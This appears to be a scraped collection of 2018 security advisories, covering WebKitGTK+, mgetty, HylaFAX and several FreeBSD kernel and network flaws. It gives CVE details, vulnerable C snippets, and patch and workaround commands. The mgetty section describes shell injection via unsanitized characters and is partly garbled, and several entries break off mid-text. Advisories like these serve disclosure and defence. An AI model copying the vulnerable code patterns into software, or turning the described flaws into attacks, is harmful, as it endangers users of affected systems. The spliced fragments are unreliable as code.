8KkVrt6i0rkc0rXeIPLso6utng0Z52n7T3BJmny7XVqYb/YWocE0SWJ4V5TIqSw9 B0M3jD6NyMqYIJSfmDBOyangEUU6Ww0c1C272tJ/Mt5YOYK9OFo/zBERdIWXm9I+ f3yD3mauZK/oLQoVheWcqLy2ThsU5Vss6fbLobhY5EF08BaUlAIdp7ietVlbz3vQ G1yzvhgLfgWteP6nTwghyznkBqZbkC/gJ49G9/YZDpm25/inOtc= =7Jzx -END PGP SIGNATURE-
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0007
--- WebKitGTK+ and WPE WebKit Security AdvisoryWSA-2018-0007 Date reported : September 26, 2018 Advisory ID : WSA-2018-0007 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0007.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0007.html CVE identifiers : CVE-2018-4207, CVE-2018-4208, CVE-2018-4209, CVE-2018-4210, CVE-2018-4212, CVE-2018-4213, CVE-2018-4191, CVE-2018-4197, CVE-2018-4299, CVE-2018-4306, CVE-2018-4309, CVE-2018-4311, CVE-2018-4312, CVE-2018-4314, CVE-2018-4315, CVE-2018-4316, CVE-2018-4317, CVE-2018-4318, CVE-2018-4319, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358, CVE-2018-4359, CVE-2018-4361. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4207 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4208 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4209 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4210 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction with indexing types caused a failure. An array indexing issue existed in the handling of a function in JavaScriptCore. This issue was addressed with improved checks. CVE-2018-4212 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4213 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4191 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. A memory corruption issue was addressed with improved validation. CVE-2018-4197 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management. CVE-2018-4299 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Samuel Groβ (saelo) working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4306 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management. CVE-2018-4309 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to an anonymous researcher working with Trend Micro's Zero Day Initiative. A malicious website may be able to execute scripts in the context of another website. A cross-site scripting issue existed in WebKit. This issue was addressed with improved URL validation. CVE-2018-4311 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Erling Alf Ellingsen (@steike). Cross-origin SecurityErrors includes the accessed frame’s origin. The issue was addressed by removing origin information. CVE-2018-4312 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management. CVE-2018-4314 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management. CVE-2018-4315 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management. CVE
X41 D-Sec GmbH Security Advisory X41-2018-007: Multiple Vulnerabilities in mgetty
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-007 Multiple Vulnerabilities in mgetty == Overview - Confirmed Affected Versions: 1.2.0 Patched Versions: 1.2.1 Vendor: mgetty Vendor URL: http://mgetty.greenie.net Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-007-mgetty Summary and Impact - -- Multiple issues have been identified in the mgetty fax software. These might be used by local users to elevate their privileges. X41 did not perform a full test or audit on the software. Product Description - --- - From the vendor: For those of you that do not know mgetty+sendfax yet: it's a reliable and proven fax send and receive solution for unix and Linux. But it can do much more... so read the docs and be surprised. Shell injection via faxq-helper === Severity Rating: Medium Vector: Fax Job CVE: CVE-2018-16741 CWE: 78 CVSS Score: 6.1 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N In fax/faxq-helper.c function do_activate(), not all characters are properly sanitized to prevent command injection. It is possible to use ||, && or > to change the control flow. {% highlight c %} /* replace all quote characters, backslash and ';' by '' */ for( q = buf; *q != '\0'; q++ ) { if ( *q == '\'' || *q == '"' || *q == '`' || *q == '\' || *q == ';' ) { *q = ''; } } {% endhighlight %} A job file containing malicious input can be constructed using faxq-helper activate . One faxrunq is started, the code is executed as the user running the command. {% highlight bash %} /* replace all quote characters, backslash and ';' by '' */ # " '\$ ; command=tr -d '\042\047\140\134\044\073' (pwd ? 0 : 1)) badlogin(tbuf); failures = 0; } (void)strcpy(tbuf, username); {% endhighlight %} Stack Based Buffer Overflow With Long Argument in contrib/scrts.c = Severity Rating: Low Vector: Command Line Parameter CVE: CVE-2018-16742 CWE: 121 CVSS Score: 2.9 CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N In file contrib/scrts.c a stack buffer overflow can be triggered via command line parameter. {% highlight c %} int main( int argc, char ** argv ) { int i, fd; struct termios tio; char device[1000]; for ( i=1; i/dev/null 2>&1", MAILER, mailto ); pipefp = popen( buf, "w" ); {% endhighlight %} Endless loop in g3/g32pbm.c === When converting g32 files using g3/g32pbm.c, an endless loop can be triggered by malformed input file. Example can be found at files/g32pmbinfiniteloop. Out Of Bounds Access in g3/pbm2g3.c === When converting pbm files using g3/pbm2g3.c, out of bounds accesses can occur with malformed input files in putwhitespan(). An example can be found with files/pbm2g2oobaccess. {% highlight c %} putcode( twhite[l].bitcode, twhite[l].bitlength ); {% endhighlight %} Workaround - -- None. Timeline - 2018-06-07 Issues found 2018-08-27 Issue reported to vendor 2018-08-28 Vendor reply 2018-09-08 Vendors sends patches 2018-09-08 CVE IDs requested 2018-09-09 CVE IDs assigned 2018-09-11 Patched Version released 2018-09-11 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier -BEGIN PGP SIGNATURE- iQJLBAEBCAA1FiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlui40AXHGFkdmlzb3Jp ZXNAeDQxLWRzZWMuZGUACgkQo5Klpg50CxDAKg/6AmXcOmQnCDVgORX9xbmLvCXc EcfNX7MNKlvegdm4D0TWb9WZKbWC0ubv1vSMB35qtYKMtdIwh/lYReb01/+WmRwV alZTSnoPZmy3Wt0e1mzkSEjJqauawbVAZfi9bfgUmX1faWDkntkoOhfJVcGy2Tia g0eiang5lg1v4m5yjiE4EHyzBKy+DqEYf6VNCje7cIQG/tFhuvatmd1HulZpFgK5 D/VBRCctKXaLNuoe5cIRmRD2tJZ4O7NmhudBVxJSrShTtv4cO0M6xPD0ddzhSHtn JnuNdqYY0+sdVO+uf9kOF8qHG6iW1fLKiQAuyYZCTCZELDOUzby1x0IN2XwNxiX4 b2sl1vp/XoPvlIlo
X41 D-Sec GmbH Security Advisory X41-2018-008: Multiple Vulnerabilities in HylaFAX
X41 D-SEC GmbH Security Advisory: X41-2018-008 Multiple Vulnerabilities in HylaFAX === Overview Confirmed Affected Versions: HylaFAX 6.0.6, HylaFAX+ 5.6.0 Confirmed Patched Versions: HylaFAX 6.0.7, HylaFAX+ 5.6.1 Vendor: Hylafax, Hylafax+ Vendor URL: https://www.hylafax.org/, http://hylafax.sourceforge.net/ Credit: X41 D-SEC GmbH, Luis Merino, Eric Sesterhenn, Markus Vervier Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-008-Hylafax/ Summary and Impact -- Severity Rating: Critical Vector: Incoming fax call CVE: CVE-2018-17141 CWE: 122, 457 CVSS Score: 9.0 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Multiple bugs were found in the code handling fax page reception in JPEG format that allow arbitrary writes to an uninitialized pointer by remote parties dialing in. When processing an specially crafted input, the issue could lead to remote code execution. Although JPEG reception is not announced as an available capability by HylaFAX and is explicitly disabled during capabilities announcement, there is code for JPEG support in HylaFAX that can be reached by a remote party when setting certain flags during session negotiation. X41 did not perform a full test or audit on the software. Product Description --- HylaFAX is an open-source system for sending and receiving faxes using one or multiple fax modems. Analysis X41 discovered several vulnerabilities in HylaFAX that are exploitable by local or remote attackers. Uninitialized pointer write in FaxModem::writeECMData() --- In CopyQuality.c++:990 recvRow is initialized only when params.jp is exactly JP_GREY or JP_COLOR and also params.df is exactly zero. {% highlight c %} uint dataform = params.df + (params.jp ? params.jp + 4 : 0); //... switch (dataform) { //... case JPGREY+4: case JPCOLOR+4: recvEOLCount = 0; recvRow = (uchar) malloc(10241000); // 1M should do it? {% endhighlight %} However, later in the same function recvRow is used as a target for memcpy() when params.jp is JP_GREY or JP_COLOR, irrespective of params.df. Consequently, if a sender crafts a DCS signal that leads to params.df being non-zero while params.jp is JP_GREY or JP_COLOR, then recvRow will be uninitialized when it is used as a target for memcpy(). {% highlight c %} if (params.jp != JPGREY && params.jp != JPCOLOR) { flushRawData(tif, 0, (const u_char) buf, cc); } else { memcpy(recvRow, (const char) buf, cc); recvRow += cc; } {% endhighlight %} Out of bounds write in FaxModem::writeECMData() --- The same piece of code for memcpy at CopyQuality.c++:1045 can be abused to perform an out of bounds write to recvRow, as there is no bounds check before writing to and incrementing recvRow. This can lead to remote code execution when an attacker sends an specially crafted input. Out of bounds write in FaxModem::recvPageDLEData() -- CopyQuality:c++:446 presents another unbounded memcpy that can be abused to perform an out of bounds write to recvRow. {% highlight c %} if (n >= RCVBUFSIZ) flushRawData(tif, 0, (const u_char) raw, n); else { memcpy(recvRow, (const char) raw, n); recvRow += n; } {% endhighlight %} The code doesn't seem to be reachable, as JPEG flag forces ECM reception. Workaround -- None. Timeline 2018-06-07 Issues found 2018-08-24 Issue reported to vendor 2018-09-02 Vendor sends patches 2018-09-17 CVE ID assigned 2018-09-18 Patches released 2018-09-19 Advisory released External links == See https://www.x41-dsec.de/lab/blog/fax/ for a blog post related to this advisory. About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier
FreeBSD Security Advisory FreeBSD-SA-18:12.elf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:12.elfSecurity Advisory The FreeBSD Project Topic: Improper ELF header parsing Category: core Module: kernel Announced: 2018-09-12 Credits:Thomas Barabosch, Fraunhofer FKIE; Mark Johnston Affects:All supported versions of FreeBSD. Corrected: 2018-09-12 05:02:11 UTC (stable/11, 11.1-STABLE) 2018-09-12 05:07:35 UTC (releng/11.2, 11.2-RELEASE-p3) 2018-09-12 05:07:35 UTC (releng/11.1, 11.1-RELEASE-p14) 2018-09-12 05:03:30 UTC (stable/10, 10.4-STABLE) 2018-09-12 05:07:35 UTC (releng/10.4, 10.4-RELEASE-p12) CVE Name: CVE-2018-6924 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background To execute a binary the kernel must parse the ELF header to determine the entry point address, the program interpreter, and other parameters. II. Problem Description Insufficient validation was performed in the ELF header parser, and malformed or otherwise invalid ELF binaries were not rejected as they should be. III. Impact Execution of a malicious ELF binary may result in a kernel crash or may disclose kernel memory. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +30 "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch # fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch.asc # gpg --verify elf.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r338605 releng/10.4/ r338606 stable/11/r338604 releng/11.1/ r338606 releng/11.2/ r338606 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6924> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:12.elf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAluYoK9fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKA+BAApeUtPHpy5mEHC8ftJ+3NZpfI8gcfuPE0dlJi6CpXq8/ruXN5Yt5X0E0l hlbNGqEMckfe3F81rCXLbtu0zeAnSBfAFcm9xSBa6aSRfP4GAZtKDKwilPqqT9F8 sOrPR/mAfxWmWcfDt8ggAx6akr2Tt48t7TiBP/kA14+CzVmp/pMU/ceFDLk8JYjY PQzVM4fHC5xeBWtA2JjMNHnhR6XMeiDOLkgeRiRW1LhB/OwWwcb0uzVixxR34mCT vFm1eJteAitoVclgnI//GkzZZ6b7SZkqyqODWKVLWXaYgb8/Z6SaKAQm2TWuHPEh nzIpPGhnXZc+36Nn9/HYDKVn3skD1sYAnTMgPcUYZH3KfkohvFdHlnoGqkcnMwTy mSKkQx9ojuLfwot7tyJCbgU/6e82ed1g9EiFZXwW8x4ePClaAvrDozz0QGwlXgyY 1jBbFp/gYznhxTetVRHo5ug5SHZgD2Ye46TCoglHX0CprhkWwpKenoCEyfyjlHXH uI+RPd46TlQfuK4bqURRpWvNWprXGqQ0ypFVW2JJgqLPBX0QS79gzqO++C8tRqQv e16mqzBGNIre/8FOCBpV/Z61NgxqeYo2ndHxc9VTMiFXK/2v3TDK9AvYZ1/xEvwC IRpC+qo870B5XT/ihC/KpYI4jgM2/pK/Mdez6Q4s5M6eeCBHAgw= =J/a5 -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-18:11.hostapd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:11.hostapdSecurity Advisory The FreeBSD Project Topic: Unauthenticated EAPOL-Key Decryption Vulnerability Category: contrib Module: wpa Announced: 2018-08-14 Credits:Mathy Vanhoef of the imec-DistriNet research group of KU Leuven Affects:All supported versions of FreeBSD. Corrected: 2018-08-15 05:03:54 UTC (stable/11, 11.1-STABLE) 2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2) 2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13) 2018-08-15 05:05:02 UTC (stable/10, 10.4-STABLE) 2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11) CVE Name: CVE-2018-14526 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The wpa_supplicant(8) utility is a client (supplicant) with support for WPA and WPA2 (IEEE 802.11i / RSN). It is suitable for both desktop and laptop computers as well as embedded systems. Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan(4) driver. The wpa_supplicant(8) utility is designed to be a "daemon" program that runs in the background and acts as the backend component controlling the wireless connection. The wpa_supplicant(8) utility supports separate frontend programs and a text-based frontend (wpa_cli(8)) and a GUI (wpa_gui) are included with wpa_supplicant(8). II. Problem Description When using WPA2, EAPOL-Key frames with the Encrypted flag and without the MIC flag set, the data field was decrypted first without verifying the MIC. When the dta field was encrypted using RC4, for example, when negotiating TKIP as a pairwise cipher, the unauthenticated but decrypted data was subsequently processed. This opened wpa_supplicant(8) to abuse by decryption and recovery of sensitive information contained in EAPOL-Key messages. See https://w1.fi/security/2018-1/unauthenticated-eapol-key-decryption.txt for a detailed description of the bug. III. Impact All users of the WPA2 TKIP pairwise cipher are vulnerable to information, for example, the group key. IV. Workaround Remove TKIP as an allowed pairwise cipher in RSN/WPA2 networks in wpa_supplicant.conf(5) by changing 'pairwise=CCMP TKIP' to 'pariwise=CCMP'. This can also be mitigated by removing TKIP as a cipher on the AP. Systems and users who do not use WPA2 TKIP are not affected. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch # fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch.asc # gpg --verify hostapd.patch.asc [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch # fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch.asc # gpg --verify hostapd-10.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the applicable daemons, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r337832 releng/10.4/ r337829 stable/11/r337831 releng/11.1/ r337828 releng/11.2/ r337828 - --
FreeBSD Security Advisory FreeBSD-SA-18:10.ip
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:10.ip Security Advisory The FreeBSD Project Topic: Resource exhaustion in IP fragment reassembly Category: core Module: inet Announced: 2018-08-14 Credits:Juha-Matti Tilli from Aalto University, Department of Communications and Networking and Nokia Bell Labs Affects:All supported versions of FreeBSD. Corrected: 2018-08-14 18:17:05 UTC (stable/11, 11.1-STABLE) 2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2) 2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13) CVE Name: CVE-2018-6923 Special note: Due to source code differences in FreeBSD 10-stable a patch is not yet available for FreeBSD 10.4. This will follow at a later date. For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Internet Protocol (IP) version 4 (IPv4) allows fragmentation of packets which are too big to traverse all the links between two end stations. Any router along the path between two end hosts may fragment packets which are larger than a link's maximum transmission unit (MTU). FreeBSD's implementation of some IPv4 protocols (such as the Transmission Control Protocol [TCP]) perform path MTU discovery to avoid the need for fragmentation. IP version 6 (IPv6) retains the concept of packet fragmentation. It changed the fragmentation operation to require that the originating end-system perform path MTU discovery and fragment packets which are too large for any MTU along the path between two end systems. While all hosts attached to the Internet are required to support fragmentation and reassembly, many hosts will encounter very few legitimate fragmented packets due to the operation of path MTU discovery. II. Problem Description A researcher has notified us of a DoS attack applicable to another operating system. While FreeBSD may not be vulnerable to that exact attack, we have identified several places where inadequate DoS protection could allow an attacker to consume system resources. It is not necessary that the attacker be able to establish two-way communication to carry out these attacks. These attacks impact both IPv4 and IPv6 fragment reassembly. III. Impact In the worst case, an attacker could send a stream of crafted fragments with a low packet rate which would consume a substantial amount of CPU. Other attack vectors allow an attacker to send a stream of crafted fragments which could consume a large amount of CPU or all available mbuf clusters on the system. These attacks could temporarily render a system unreachable through network interfaces or temporarily render a system unresponsive. The effects of the attack should clear within 60 seconds after the attack stops. IV. Workaround Disable fragment reassembly, using these commands: % sysctl net.inet.ip.maxfragpackets=0 % sysctl net.inet6.ip6.maxfrags=0 On systems compiled with VIMAGE, these sysctls will need to be executed for each VNET. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release or security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch # fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch.asc # gpg --verify ip.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision -
FreeBSD Security Advisory FreeBSD-SA-18:09.l1tf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:09.l1tf Security Advisory The FreeBSD Project Topic: L1 Terminal Fault (L1TF) Kernel Information Disclosure Category: core Module: Kernel Announced: 2018-08-14 Affects:All supported versions of FreeBSD. Corrected: 2018-08-14 17:51:12 UTC (stable/11, 11.1-STABLE) 2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2) 2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13) CVE Name: CVE-2018-3620, CVE-2018-3646 Special Note: Speculative execution vulnerability mitigation remains a work in progress. This advisory addresses the issue in FreeBSD 11.1 and later. We expect to update this advisory to include 10.4 at a later time. For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background When a program accesses data in memory via a logical address it is translated to a physical address in RAM by the CPU. Accessing an unmapped logical address results in what is known as a terminal fault. II. Problem Description On certain Intel 64-bit x86 systems there is a period of time during terminal fault handling where the CPU may use speculative execution to try to load data. The CPU may speculatively access the level 1 data cache (L1D). Data which would otherwise be protected may then be determined by using side channel methods. This issue affects bhyve on FreeBSD/amd64 systems. III. Impact An attacker executing user code, or kernel code inside of a virtual machine, may be able to read secret data from the kernel or from another virtual machine. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +30 "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch # fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch.asc # gpg --verify l1tf-11.2.patch.asc [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch # fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch.asc # gpg --verify l1tf-11.1.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details CVE-2018-3620 (L1 Terminal Fault-OS) - FreeBSD reserves the the memory page at physical address 0, so it will not contain secret data. FreeBSD zeros the paging data structures for unmapped addresses, so that speculatively executed L1 Terminal Faults will access only the reserved, unused page. CVE-2018-3646 (L1 Terminal Fault-VMM) - - Patched systems flush the L1 data cache prior to guest entry, so that there is no secret data in cache for a terminal fault (from the the guest) to access. The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r337794 releng/11.1/ r337828 releng/11.2/ r337828 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References More information on L1 Terminal Fault is available at: htt
FreeBSD Security Advisory FreeBSD-SA-18:08.tcp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:08.tcpSecurity Advisory The FreeBSD Project Topic: Resource exhaustion in TCP reassembly Category: core Module: inet Announced: 2018-08-06 Credits:Juha-Matti Tilli from Aalto University, Department of Communications and Networking and Nokia Bell Labs Affects:All supported versions of FreeBSD. Corrected: 2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE) 2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2) 2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13) 2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE) 2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11) CVE Name: CVE-2018-6922 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. 0. Revision history v1.0 2018-08-06 Initial release. v1.1 2018-08-14 Fixed documentation date in manual pages. I. Background The Transmission Control Protocol (TCP) of the TCP/IP protocol suite provides a connection-oriented, reliable, sequence-preserving data stream service. To transmit a stream of data, TCP breaks the data stream into segments for transmission through the Internet, and reassembles the segments at the receiving side to recreate the data stream. II. Problem Description One of the data structures that holds TCP segments uses an inefficient algorithm to reassemble the data. This causes the CPU time spent on segment processing to grow linearly with the number of segments in the reassembly queue. III. Impact An attacker who has the ability to send TCP traffic to a victim system can degrade the victim system's network performance and/or consume excessive CPU by exploiting the inefficiency of TCP reassembly handling, with relatively small bandwidth cost. IV. Workaround As a workaround, system administrators should configure their systems to only accept TCP connections from trusted end-stations, if it is possible to do so. For systems which must accept TCP connections from untrusted end-stations, the workaround is to limit the size of each reassembly queue. The capability to do that is added by the patches noted in the "Solution" section below. V. Solution As a temporary solution to this problem, these patches limit the size of each TCP connection's reassembly queue. The value is controlled by a sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum number of TCP segments that can be outstanding on a session's reassembly queue. This value defaults to 100. Note that setting this value too low could impact the throughput of TCP connections which experience significant loss or reordering. However, the higher this number is set, the more resources can be consumed on TCP reassembly processing. Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc # gpg --verify tcp-10.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc # gpg --verify tcp-11.patch.asc [*** v1.1 NOTE ***] Patchsets are provided for completeness, it have little impact to runtime behavior. [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch # fetch 